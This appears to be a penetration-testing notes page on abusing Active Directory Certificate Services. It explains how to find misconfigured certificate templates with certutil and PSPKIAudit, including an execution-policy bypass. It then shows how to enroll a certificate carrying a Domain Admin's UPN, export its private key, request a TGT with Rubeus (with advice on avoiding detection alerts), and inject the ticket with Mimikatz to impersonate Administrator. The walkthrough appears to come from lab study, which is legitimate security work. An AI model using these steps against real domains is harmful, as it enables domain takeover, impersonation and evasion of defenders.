Skip to main content

Certificates

AD Certificate Services (CS) is Microsoft's Public Key Infrastructure (PKI) Implementation. Since AD provides a Level of Trust in an Organizations, it can be used as a CA to Prove and Delegate Trust. AD CS is used to Encrypting File Systems, Creating and Verifying Digital Signatures, and User Authentication.

Since AD CS is a Privileged function, it usually runs on selected Domain Controllers. Meaning Normal Users can't really interact with the Service Directly. But Organizations tend to be too large to have an Administrator create and distribute each Certificate Manually. This is where Certificate Templates are used.

Administrators of AD CS can create several Templates that can Allow any User with the Relevant Permissions to request a Certificate themselves. These Templates have Parameters that say which User can request the Certificate and what is Required. Specific combinations of these parameters can be Abused for Privilege Escalation and Persistent Access.


Finding Vulnerable Certificate Templates

To find Vulnerable Templates we can use the Windows Built-In Tool certutil. This will provide output on all Configured Templates.


  • We are looking for a Template with the following Poisonous Parameter Combination:
    • Client Authentication - The Certificate can be used for Client Authentication.
    • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT - The Certificate Template allows us to specify the Subject Alternative Name (SAN).
    • CTPRIVATEKEY_FLAG_EXPORTABLE_KEY - The Certificate will be exportable with the Private Key.
    • Certificate Permissions - We have the required Permissions to use the Certificate Template.

:: Dump Output on all Configured Templates
certutil -Template -v > Templates.txt


The Process of finding a Vulnerable Certificate can be Automated with PSPKIAudit. Although a Manual approach is Recommended.

PSPKIAudit

# Unblocks files that were Downloaded from the Internet
Get-ChildItem -Recurse | Unblock-File

# Sets Execution Policies for Windows Computers
Set-ExecutionPolicy Bypass -Scope process -Force

# Adds Modules to the Current Session
Import-Module .\PSPKIAudit.psm1


Exploiting a Certificate Template

Required Privileges: Administrators

Make sure Restricted Admin Mode is Disabled.


RDP into the Target Machine with Administrator Privileges.

  • Start the Microsoft Management Console (MMC):
    • Click File ➜ Add/Remove Snap-In..
    • Add the Certificates Snap-In and make sure to select Computer Account and Local Computer on the prompts.
    • Click OK
    • We should now see the Certificate Snap-In.

  • We will now Request a Personal Certificate:
    • Right Click on Personal and select All Tasks ➜ Request New Certificate..
    • Click Next Twice to select the AD Enrollment Policy.
    • We will see that we have one Template that we can Request, but first, we need to provide Additional Information.
    • Click on the More Information Warning.
    • Change the Subject Name Type option to Common Name and provide any Value, since it does not matter, and click Add.
    • Change the Alternative Name Type option to User Principal Name.
    • Supply the UPN of the User you want to Impersonate. The best would be a DA Account such as Administrator@za.adobe.loc and click Add.
    • Click Apply and OK.
    • Now select the Certificate and click Enroll. We should be able to see our Certificate.

  • The last step is to Export our Certificate with the Private Key:
    • Right-Click on the Certificate and select All Tasks ➜ Export..
    • Click Next, select Yes, Export the Private Key, and click Next.
    • Click Next, then set a Password for the Certificate since the Private Key cannot be exported without a Password.
    • Click Next and select a Location to Store the Certificate.
    • Click Next and finally click Finish.

User Impersonation Through a Certificate

Now we can Impersonate a User. To perform this, two steps are Required:

  • Use the Certificate to request a Kerberos Ticket-Granting Ticket (TGT)
  • Load the Kerberos TGT

For the first step we can use Rubeus. A Tool for raw Kerberos Interaction and Abuses.

:: [user]        - Specifies the User that we will Impersonate and has to match the UPN for the Certificate we Generated
:: [enctype] - This specifies the Encryption type for the Ticket. Setting this is Important for Evasion, since the Default Encryption algorithm is weak, which would result in an Overpass-The-Hash Alert
:: [certificate] - Path to the Certificate we Generated
:: [password] - Password for our Certificate File
:: [outfile] - The File where our TGT will be Output
:: [domain] - FQDN of the Domain we are Currently Attacking
:: [dc] - The IP of the Domain Controller which we are Requesting the TGT from. Usually it is best to select a DC that has a CA Service Running
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate: /password: /outfile: /domain:za.adobe.loc /dc:

:: Query Example
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\arthur.holland\Desktop\certificate.pfx /password:492xzL5O4TS /outfile:administrator.kirbi /domain:za.adobe.loc /dc:10.20.30.50


Now we can use Mimikatz to load the TGT and Authenticate. After that we can Verify that the Tickets were correctly Injected with the Windows Built-In Command klist.

privilege::debug

:: Name of the Ticket to Impersonate
kerberos::ptt administrator.kirbi